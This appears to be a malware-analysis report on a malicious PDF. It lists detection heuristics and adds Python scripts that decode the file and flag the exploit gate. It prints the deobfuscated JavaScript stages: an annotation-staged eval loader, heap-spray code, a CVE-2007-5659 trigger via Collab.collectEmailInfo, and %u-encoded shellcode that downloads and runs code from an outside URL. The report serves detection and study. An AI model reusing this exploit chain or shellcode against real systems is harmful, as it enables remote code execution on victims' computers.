Malware Insights
The PDF carries JavaScript in object 4 (a /JS stream at offset 0xE1) that unpacks through three decode stages before any exploit code runs. Stage 0 stores the next stage as a comma-separated list of character codes plus a decrypt(str, jump) routine (the codes decode with jump 0). Stage 1 calls app.doc.syncAnnotScan(), reads the /Subject of an annotation on page 0, hex-decodes its '-'-separated fields and passes the result to app['eval'], with every step gated on app.plugIns.length so the chain stalls in a viewer or emulator that reports no plug-ins. Stage 2 derives its decryption key from the digits of its own function source, decodes a second annotation subject and evals that. The final stage sprays the heap with 0x0c0c filler blocks that each end in an egg-hunter stub, parks the main shellcode on the app object, and, only when the highest plug-in version falls in the (>= 8 && < 8.11) or < 7.1 window that Adobe patched in APSB08-13, calls Collab.collectEmailInfo() with an oversized msg argument (CVE-2007-5659). The shellcode builds the string urlmon on the stack and carries the download URL http://googleinru.in/cgi-bin/etn/z002106201r0019Rf7577e2fX24a65b0dY53bfb0c6Z0100f060 in plain ASCII, followed at runtime by a short tag that encodes the Reader version. The intent is a download-and-execute of a native second stage; that second stage is not among the carved artifacts.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9

- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate, CVE-2007-5659 (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not. Matched line in script: `var bP4Or____gi = new Array();var LGP8____j__W_F = 0;var Yye3o_vjVXl = "";function pUBr_O_18_yq(T_2_bQ_M3Ap, M_np00Vn30E11j){var P_5C_70m__w_5 = M_np00Vn30E11j.toString();var l3p6_8p2j_Uib15 = "";for(var BCIEFj_1_BS = 0; BCIEFj_1_BS < P_5C_70m__w_5.length; BCIEFj_1_BS++) {var pk0l_70dWE0 = parseInt(P_5C_70m__w_5.substr(BCIEFj_1_BS, 1));if (!isNaN(pk0l_70dWE0)) {pk0l_70dWE0 = pk0l_70dWE0.toString(16);if (pk0l_70dWE0.length == 1) { pk0l_70dWE0 = "0" + pk0l_70dWE0; }else if (pk0l_70dWE0.length != 2 …` (the opening line of legacy_pdfkit_stage_001.js; the comparison itself sits further along that line and reads `(Mr_LK____f2 >= 8 && Mr_LK____f2 < 8.11) || Mr_LK____f2 < 7.1`, 8.11 being how Acrobat's version numbers spell 8.1.1).
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }` (the decrypt loop in javascript_obj0004_000.js).
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample it is the %uXXXX form: the URL sits in plain ASCII at the tail of the iJ_F__P string in legacy_pdfkit_stage_001.js, a few bytes after the push immediates that spell urlmon.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; rule PDF_FOXIT_SYNCANNOTSCAN): PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://googleinru.in/cgi-bin/etn/z002106201r0019Rf7577e2fX24a65b0dY53bfb0c6Z0100f060 (referenced by PDF JavaScript).
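The gate and API rules above can be checked mechanically on the deobfuscated stages. The following is an added Python example, not the analyzer's own rule engine: its inputs are constructed excerpts lifted from the legacy_pdfkit_stage_001.js and numeric_charcode_stage_000.js previews further down this page, plus a benign form script as a negative control. Rule ids CVE_2007_5659, PDF_FOXIT_SYNCANNOTSCAN and PDF_JS_ADOBE_APSB08_13_PATCH_GATE are the report's; APP_BRACKET_DISPATCH and APP_SETTIMEOUT_STRING are names assumed for this example.

```python
import re

# Constructed excerpts, lifted from the script previews on this page; identifiers are the
# sample's own and only line breaks were added.
STAGE3_EXCERPT = r'''
function wYWQPi_oR_tr(){var vqMDWqeXut2qLS = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 12; BCIEFj_1_BS++) {vqMDWqeXut2qLS += unescape("%u0c0c%u0c0c");}var R01s0qd82 = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 750; BCIEFj_1_BS++) {R01s0qd82 += vqMDWqeXut2qLS;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: R01s0qd82});app.clearTimeOut(LGP8____j__W_F);}
function X_6qHcW6Jw1vI1o(Mr_LK____f2){var lG1P3_3_pUYt2N = LGP8____j__W_F;if ((Mr_LK____f2 >= 8 && Mr_LK____f2 < 8.11) || Mr_LK____f2 < 7.1) {S_aE4_8_h34h3Yr(23, "%u0c0c%u0c0c", Mr_LK____f2);wYWQPi_oR_tr();}if (lG1P3_3_pUYt2N) {app.clearTimeOut(lG1P3_3_pUYt2N);}}
if (app.viewerVersion == 9.103 && CoW0_imV < 9.13) {CoW0_imV = 9.13;}
app.u_2__r7F4_j80 = X_6qHcW6Jw1vI1o;LGP8____j__W_F = app.setTimeOut("app.u_2__r7F4_j80(" + CoW0_imV.toString() + ")", 50);
'''
STAGE1_EXCERPT = r'''
app.doc.syncAnnotScan();
if (app.plugIns.length >= 2) { fnc += 'l'; app[fnc](buf); }
'''
# Negative control (constructed): an ordinary form script that also looks at the viewer version.
BENIGN_FORM = r'''
if (app.viewerVersion < 7) { app.alert("Please update Adobe Reader"); }
this.getField("total").value = this.getField("qty").value * 2;
'''

# CVE_2007_5659 and PDF_FOXIT_SYNCANNOTSCAN are this report's rule ids; the other two
# names are assumed for this example.
API_RULES = {
    "CVE_2007_5659": re.compile(r"Collab\.collectEmailInfo\s*\("),
    "PDF_FOXIT_SYNCANNOTSCAN": re.compile(r"\bsyncAnnotScan\s*\("),
    "APP_BRACKET_DISPATCH": re.compile(r"\bapp\s*\[\s*[\w$]+\s*\]\s*\("),  # app[fnc](...) hides eval
    "APP_SETTIMEOUT_STRING": re.compile(r"app\.setTimeOut\s*\(\s*[\"']"),  # string argument is eval'd later
}

# identifier <op> numeric-literal, e.g. `Mr_LK____f2 < 8.11`
CMP_RE = re.compile(r"([A-Za-z_$][\w$]*)\s*(>=|<=|==|<|>)\s*(\d+(?:\.\d+)?)")

# The APSB08-13 window as the kit spells it: Acrobat reports 8.1.1 as 8.11.
GATE_TESTS = {(">=", 8.0), ("<", 8.11), ("<", 7.1)}


def version_comparisons(js):
    """All (variable, operator, number) comparisons against a numeric literal."""
    return [(var, op, float(num)) for var, op, num in CMP_RE.findall(js)]


def apsb08_13_gate(js):
    """Name of a variable tested against all three APSB08-13 patch points, else None."""
    tests_by_var = {}
    for var, op, num in version_comparisons(js):
        tests_by_var.setdefault(var, set()).add((op, num))
    for var, tests in tests_by_var.items():
        if GATE_TESTS <= tests:
            return var
    return None


def scan(js):
    """Sorted rule ids that fire on a (deobfuscated) script."""
    hits = [name for name, rx in API_RULES.items() if rx.search(js)]
    if apsb08_13_gate(js) is not None:
        hits.append("PDF_JS_ADOBE_APSB08_13_PATCH_GATE")
    return sorted(hits)


if __name__ == "__main__":
    for label, js in (("stage 3", STAGE3_EXCERPT), ("stage 1", STAGE1_EXCERPT), ("benign form", BENIGN_FORM)):
        print(label, scan(js), "gate variable:", apsb08_13_gate(js))
```

The gate rule deliberately keys on the combination of all three comparisons against one variable: a lone `app.viewerVersion < 7` in a form script (the benign control) only produces an upgrade prompt and must not fire.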
Extracted artifacts 4
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1940 bytes |
| numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 505 bytes |
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1C55 | 1851 bytes |
| legacy_pdfkit_stage_001.js | deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x4C3 | 5031 bytes |

javascript_obj0004_000.js (pdf-javascript-stream; PDF /JS object 4 at offset 0xE1; 1940 bytes)
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview script (first 1,000 lines of the extracted script):

```javascript
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}
```

The codes decode with jump 0 (118,97,114 is "var") and the result is the numeric_charcode_stage_000.js artifact; the preview stops before the call that hands sourceCode to decrypt.
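The "numeric char-code string" the analyzer names in the artifact table is a recurring pattern, and the jump is not always 0. As an added Python example (not the analyzer's code), here is the general form of that decode: find quoted comma-separated number runs, try every jump from 0 to 255, and keep the result that looks most like JavaScript. The input is a constructed excerpt, the opening of the sourceCode string from the preview above; the marker list and the 0.95 printable threshold are choices made for this example.

```python
import re
import string

# Constructed excerpt: the opening of the sourceCode string and the decrypt()
# routine from javascript_obj0004_000.js on this page. The real string runs on to
# encode all of numeric_charcode_stage_000.js; only its first bytes are kept here.
STAGE0_EXCERPT = r'''sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59";
function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }'''

# A double-quoted run of at least 16 comma-separated decimal numbers.
CHARCODE_RUN_RE = re.compile(r'"((?:\d{1,5},){15,}\d{1,5})"')

# Tokens a decoded Acrobat JavaScript stage tends to contain; each hit adds 1 to the score.
# This list and the 0.95 printable threshold below are choices made for this example.
JS_MARKERS = ("var ", "function", "app.", "this.", "eval(", "unescape(", "fromCharCode", "();")


def find_charcode_runs(js):
    """Every numeric char-code array literal in the script, as a list of ints."""
    return [[int(n) for n in m.group(1).split(",")] for m in CHARCODE_RUN_RE.finditer(js)]


def decode_with_jump(codes, jump):
    """The sample's decrypt(): String.fromCharCode(code - jump) for every element.
    Returns None when any value leaves the code-point range."""
    chars = []
    for code in codes:
        value = code - jump
        if not 0 <= value <= 0x10FFFF:
            return None
        chars.append(chr(value))
    return "".join(chars)


def printable_ratio(text):
    return sum(ch in string.printable for ch in text) / len(text) if text else 0.0


def best_decode(codes, max_jump=255, min_printable=0.95):
    """Try every jump in [0, max_jump] and keep the most JavaScript-looking result.
    Returns (jump, text), or (None, None) if no candidate is mostly printable."""
    best_jump, best_text, best_score = None, None, 0.0
    for jump in range(max_jump + 1):
        text = decode_with_jump(codes, jump)
        if text is None:
            continue
        score = printable_ratio(text) + sum(marker in text for marker in JS_MARKERS)
        if score > best_score:
            best_jump, best_text, best_score = jump, text, score
    if best_text is None or printable_ratio(best_text) < min_printable:
        return None, None
    return best_jump, best_text


if __name__ == "__main__":
    for run in find_charcode_runs(STAGE0_EXCERPT):
        jump, text = best_decode(run)
        print("jump", jump)
        print(text)
```

Scoring on marker tokens rather than on printability alone matters because a wrong jump often still yields mostly printable text; the marker count separates real JavaScript from a shifted look-alike.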
numeric_charcode_stage_000.js (deobfuscated-js; numeric char-code string decoded JavaScript at offset 0xEF; 505 bytes)
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):

```javascript
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
    var num = 1;

    pr = app.doc.getAnnots(
        {
            nPage: 0
        }
    );

    sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    var proc = String.fromCharCode(22+15);

    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
}

if (app.plugIns.length >= 2) {
    fnc += 'l';
    app[fnc](buf);
}
```

This stage calls app.doc.syncAnnotScan() (the PDF_FOXIT_SYNCANNOTSCAN hit), fetches the page-0 annotations, takes the /Subject of annotation index 1, splits it on '-', turns each field from hex into one character and hands the result to app['eval'], the name being assembled as 'ev' + 'a' + 'l'. Each step is gated on app.plugIns.length, and the 'a' is only appended when more than three plug-ins are present, so a viewer or emulator with a short plug-in list ends up calling app['evl'] and fails before any payload runs. proc = String.fromCharCode(22+15) evaluates to '%' and is never used.
legacy_pdfkit_stage_000.js (deobfuscated-js; repeated-marker hex decoded JavaScript at offset 0x1C55; 1851 bytes)
SHA-256: 929f530db04579c059a9ad694942ebba650b28c2e9b75514e822a169f18d78b9
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):

```javascript
function EQ_kU1J_Pje13p(s68Jm_UnTD__2s, Q_e3JU_5g){var sSftP_t = 4;var NB24__5EE51__cu = new Array();var i320ffN_ulu = new Array(107,256,11, 512, 106, 11, 44,40, 33);i320ffN_ulu[5] += 12;var VX_J__33pm_2 = "";try {var h_AyT_Y71_40k86 = 0;if (app) {Q_e3JU_5g = pr[h_AyT_Y71_40k86].subject;}} catch(e) {}if (!s68Jm_UnTD__2s) { NB24__5EE51__cu[0] = 0;NB24__5EE51__cu[1] = NB24__5EE51__cu[0];NB24__5EE51__cu[2] = NB24__5EE51__cu[1];NB24__5EE51__cu[3] = NB24__5EE51__cu[2];var hd_0_jFU48_j = i320ffN_ulu[6] + 3;var J84r_ijw = hd_0_jFU48_j + 11;var jmR0F3VS_20F_J = EQ_kU1J_Pje13p;var A3lg5qVX6Xh = 0;jmR0F3VS_20F_J = jmR0F3VS_20F_J.toString();for(var Sm0C6_8LN = 0; Sm0C6_8LN < jmR0F3VS_20F_J.length; Sm0C6_8LN++) {var P6ym0r_O8 = jmR0F3VS_20F_J.charCodeAt(Sm0C6_8LN);if (P6ym0r_O8 > hd_0_jFU48_j && P6ym0r_O8 < J84r_ijw) {if (A3lg5qVX6Xh == 4) {A3lg5qVX6Xh = 0;}NB24__5EE51__cu[A3lg5qVX6Xh] += P6ym0r_O8;if (NB24__5EE51__cu[A3lg5qVX6Xh] > i320ffN_ulu[3]) {NB24__5EE51__cu[A3lg5qVX6Xh] -= 512;}A3lg5qVX6Xh++;}}}else { NB24__5EE51__cu = s68Jm_UnTD__2s;}for (var Xi5K_Hf_b_72_M = 0; Xi5K_Hf_b_72_M < 4; Xi5K_Hf_b_72_M++) {if (NB24__5EE51__cu[Xi5K_Hf_b_72_M] > i320ffN_ulu[1]) {NB24__5EE51__cu[Xi5K_Hf_b_72_M] -= i320ffN_ulu[1];}}var Onh__4tY8_bxn = 0;var Iwo5Y__185_Jd = 0;var GO__Dt;var aldFub7Rwr = 0;while ( Onh__4tY8_bxn < Q_e3JU_5g.length ) {var FJ1UX_41 = "";FJ1UX_41 = Q_e3JU_5g.substr(Onh__4tY8_bxn, 2);var T_3__24_v = parseInt(FJ1UX_41, i320ffN_ulu[5]); if (Iwo5Y__185_Jd == 4) {Iwo5Y__185_Jd = 0;}T_3__24_v -= (aldFub7Rwr + 2) * NB24__5EE51__cu[Iwo5Y__185_Jd];if (T_3__24_v < 0) {T_3__24_v -= Math.floor(T_3__24_v / i320ffN_ulu[1]) * i320ffN_ulu[1];}VX_J__33pm_2 += String.fromCharCode(T_3__24_v);{Onh__4tY8_bxn += 2;aldFub7Rwr++;Iwo5Y__185_Jd++;}}var VVd_mM435 = this;VVd_mM435["eval"](VX_J__33pm_2);return 0;}
EQ_kU1J_Pje13p(0);
```

This stage is a self-keyed decoder. It reads pr[0].subject (the annotation list that the previous stage left in the global pr), derives a four-slot key from the digit characters of its own source text (char codes 48 to 57, collected from EQ_kU1J_Pje13p.toString(), each slot wrapped at 512 and then at 256), walks the subject two characters at a time as parseInt(pair, 23) minus (counter + 2) times the next key slot, reduces negative values modulo 256, and evals the result through this["eval"]. Because the identifiers and numeric literals supply the key, renaming a variable or changing a constant breaks the decode; the annotation-subject callee-key artifact below is its output.
legacy_pdfkit_stage_001.js (deobfuscated-js; annotation-subject callee-key decoded JavaScript at offset 0x4C3; 5031 bytes)
SHA-256: 13a99d9106d5c81716df2e1fea66a60680acf737f1c7a15a11bf1088c93d08cd
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script; the minified source is broken at function boundaries only):

```javascript
var bP4Or____gi = new Array();var LGP8____j__W_F = 0;var Yye3o_vjVXl = "";
function pUBr_O_18_yq(T_2_bQ_M3Ap, M_np00Vn30E11j){var P_5C_70m__w_5 = M_np00Vn30E11j.toString();var l3p6_8p2j_Uib15 = "";for(var BCIEFj_1_BS = 0; BCIEFj_1_BS < P_5C_70m__w_5.length; BCIEFj_1_BS++) {var pk0l_70dWE0 = parseInt(P_5C_70m__w_5.substr(BCIEFj_1_BS, 1));if (!isNaN(pk0l_70dWE0)) {pk0l_70dWE0 = pk0l_70dWE0.toString(16);if (pk0l_70dWE0.length == 1) { pk0l_70dWE0 = "0" + pk0l_70dWE0; }else if (pk0l_70dWE0.length != 2) { pk0l_70dWE0 = "00"; }l3p6_8p2j_Uib15 = pk0l_70dWE0 + l3p6_8p2j_Uib15;}}while(l3p6_8p2j_Uib15.length < 8) { l3p6_8p2j_Uib15 = "0" + l3p6_8p2j_Uib15; }var ln_4R__x = T_2_bQ_M3Ap.toString(16);if (ln_4R__x.length == 1) { ln_4R__x = "0" + ln_4R__x; }else if (ln_4R__x.length != 2) { ln_4R__x = "00"; }l3p6_8p2j_Uib15 = "3" + ln_4R__x + "P" + l3p6_8p2j_Uib15;return l3p6_8p2j_Uib15;}
function Ch_b__7F(iJ_F__P, f_Aj74_M2evj){var EH32M_7_4cu_iL = new Array("");var Vy_8g2l_25XS_Et = iJ_F__P;var pO7W_Y5y;if ((pO7W_Y5y = iJ_F__P.lastIndexOf("%u00")) != -1) {if (pO7W_Y5y + 6 == iJ_F__P.length) {EH32M_7_4cu_iL[0] = iJ_F__P.substr(pO7W_Y5y + 4, 2);Vy_8g2l_25XS_Et = iJ_F__P.substring(0, pO7W_Y5y);}}pO7W_Y5y = 1;for (BCIEFj_1_BS = 0; BCIEFj_1_BS < f_Aj74_M2evj.length; BCIEFj_1_BS++) {var T_E_0_N_JH0_S = f_Aj74_M2evj.charCodeAt(BCIEFj_1_BS).toString(16);if (T_E_0_N_JH0_S.length == 1) { T_E_0_N_JH0_S = "0" + T_E_0_N_JH0_S; }EH32M_7_4cu_iL[pO7W_Y5y] = T_E_0_N_JH0_S;pO7W_Y5y++;}BCIEFj_1_BS = EH32M_7_4cu_iL[0].length ? 0 : 1;EH32M_7_4cu_iL[pO7W_Y5y] = "00";EH32M_7_4cu_iL[pO7W_Y5y + 1] = "00";pO7W_Y5y += 2;if ((EH32M_7_4cu_iL.length - BCIEFj_1_BS) % 2) {EH32M_7_4cu_iL[pO7W_Y5y] = "00";}while(BCIEFj_1_BS < EH32M_7_4cu_iL.length) {Vy_8g2l_25XS_Et += "%u" + EH32M_7_4cu_iL[BCIEFj_1_BS + 1] + EH32M_7_4cu_iL[BCIEFj_1_BS];BCIEFj_1_BS += 2;}Vy_8g2l_25XS_Et += "%u0000";return Vy_8g2l_25XS_Et;}
function E0v7W0nCf(E42FFwd, hN_RnS){while (E42FFwd.length*2<hN_RnS) {E42FFwd += E42FFwd;}E42FFwd = E42FFwd.substring(0,hN_RnS/2);return E42FFwd;}
function S_aE4_8_h34h3Yr(k160Ra__qli, y41eH_wjbxq, CoW0_imV){var JA3e2_G_w = 0x0c0c0c0c;var E42FFwd = unescape(y41eH_wjbxq);var f_Aj74_M2evj = pUBr_O_18_yq(k160Ra__qli, CoW0_imV);var PqK_L7g = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var iJ_F__P = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6a70%u6e74%u0049%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u6652%u3537%u3737%u3265%u5866%u3432%u3661%u6235%u6430%u3559%u6233%u6266%u6330%u5a36%u3130%u3030%u3066%u3036";app.i3_l2T_f = unescape(Ch_b__7F(iJ_F__P, f_Aj74_M2evj));var s2Qw1_l__ih = 0x400000;var Ux_I8J = PqK_L7g.length * 2;var hN_RnS = s2Qw1_l__ih - (Ux_I8J+0x38);E42FFwd = E0v7W0nCf(E42FFwd, hN_RnS);var p_gxw21 = (JA3e2_G_w - 0x400000)/s2Qw1_l__ih;for (var J8_42E_GYo = 0; J8_42E_GYo < p_gxw21; J8_42E_GYo++) {bP4Or____gi[J8_42E_GYo] = E42FFwd + PqK_L7g;}}
function wYWQPi_oR_tr(){var vqMDWqeXut2qLS = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 12; BCIEFj_1_BS++) {vqMDWqeXut2qLS += unescape("%u0c0c%u0c0c");}var R01s0qd82 = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 750; BCIEFj_1_BS++) {R01s0qd82 += vqMDWqeXut2qLS;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: R01s0qd82});app.clearTimeOut(LGP8____j__W_F);}
function X_6qHcW6Jw1vI1o(Mr_LK____f2){var lG1P3_3_pUYt2N = LGP8____j__W_F;if ((Mr_LK____f2 >= 8 && Mr_LK____f2 < 8.11) || Mr_LK____f2 < 7.1) {S_aE4_8_h34h3Yr(23, "%u0c0c%u0c0c", Mr_LK____f2);wYWQPi_oR_tr();}if (lG1P3_3_pUYt2N) {app.clearTimeOut(lG1P3_3_pUYt2N);}}
var CoW0_imV = 0;var D276_6Yh40i5_0 = app.plugIns;for (var kpc081_P2Mc = 0; kpc081_P2Mc < D276_6Yh40i5_0.length; kpc081_P2Mc++) {var x8WG6y = D276_6Yh40i5_0[kpc081_P2Mc].version;if (x8WG6y > CoW0_imV) { CoW0_imV = x8WG6y; }}if (app.viewerVersion == 9.103 && CoW0_imV < 9.13) {CoW0_imV = 9.13;}app.u_2__r7F4_j80 = X_6qHcW6Jw1vI1o;LGP8____j__W_F = app.setTimeOut("app.u_2__r7F4_j80(" + CoW0_imV.toString() + ")", 50);
```

What the final stage does, function by function. S_aE4_8_h34h3Yr builds the heap spray: 48 strings (the loop bound (0x0c0c0c0c - 0x400000) / 0x400000 is 47.19) of just under 0x400000 bytes each, every one a run of 0x0c0c code units followed by the short PqK_L7g stub. That stub (mov eax, 0x90509050 then repe scasd) is an egg hunter for the %u9050%u9050%u9050%u9050 marker that opens the main shellcode iJ_F__P, which is kept alive on the app object as app.i3_l2T_f rather than in the spray. Ch_b__7F appends the return value of pUBr_O_18_yq(23, version), a tag such as 317P00000108 for version 8.1 (the constant 23 as hex 17 plus the digits of the Reader version), as bytes immediately after the URL, then null-terminates, so the request the shellcode issues carries that tag as a suffix of the URL listed under EMBEDDED_URL; the static extraction shows only the prefix. wYWQPi_oR_tr triggers CVE-2007-5659 by passing an 18,000-character msg of 0x0c0c code units (12 × 2 characters, repeated 750 times) to Collab.collectEmailInfo. X_6qHcW6Jw1vI1o runs both only when the highest plug-in version satisfies (>= 8 && < 8.11) || < 7.1, where 8.11 is how Acrobat reports 8.1.1 (the 9.103 to 9.13 fix-up at the end applies the same convention to 9.1.3), and the whole thing is launched 50 ms later through app.setTimeOut with a string argument, itself an eval surface.